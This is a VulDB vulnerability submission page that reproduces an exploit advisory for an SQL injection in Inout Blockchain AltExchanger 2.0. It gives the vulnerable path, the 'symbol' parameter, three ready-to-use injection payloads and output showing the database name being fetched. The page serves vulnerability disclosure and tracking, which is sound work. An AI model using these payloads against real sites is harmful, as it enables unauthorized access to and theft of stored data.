提出 #177561: Inout Blockchain AltExchanger 2.0 - SQL Injection情報

タイトルInout Blockchain AltExchanger 2.0 - SQL Injection
説明# Exploit Title: Inout Blockchain AltExchanger 2.0 - SQL Injection # Date: 04/07/2023 # Exploit Author: CraCkEr # Vendor: Inout Scripts # Vendor Homepage: https://www.inoutscripts.com/ # Software Link: https://www.inoutscripts.com/products/inout-blockchain-altexchanger/ # Version: 2.0 # Tested on: Windows 10 Pro # Impact: Database Access Release Notes: SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. Path: /application/third_party/Chart/TradingView/chart_content/master.php/history https://website/application/third_party/Chart/TradingView/chart_content/master.php/history?symbol=[SQLI]&resolution=5&from=1688226203&to=1688229203 GET parameter 'symbol' is vulnerable to SQL Injection --- Parameter: symbol (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: symbol=ZRX-BTC') AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: symbol=ZRX-BTC') AND 06585=6585 Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (IF - comment) Payload: symbol=ZRX-BTC'XOR(IF(now()=sysdate(),SLEEP(8),0))XOR'Z&resolution=5&from=1688226203&to=1688229203 --- [+] Starting the Attack fetching current database current database: '*****_blockchain_altexchanger_***' [-] Done
ユーザー
 skalvin (UID 49463)
送信2023年07月04日 18:01 (3 年 ago)
モデレーション2023年07月11日 17:23 (7 days later)
ステータス重複
VulDBエントリ200588 [Inout Blockchain AltExchanger master.php シンボル SQLインジェクション]
ポイント0

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!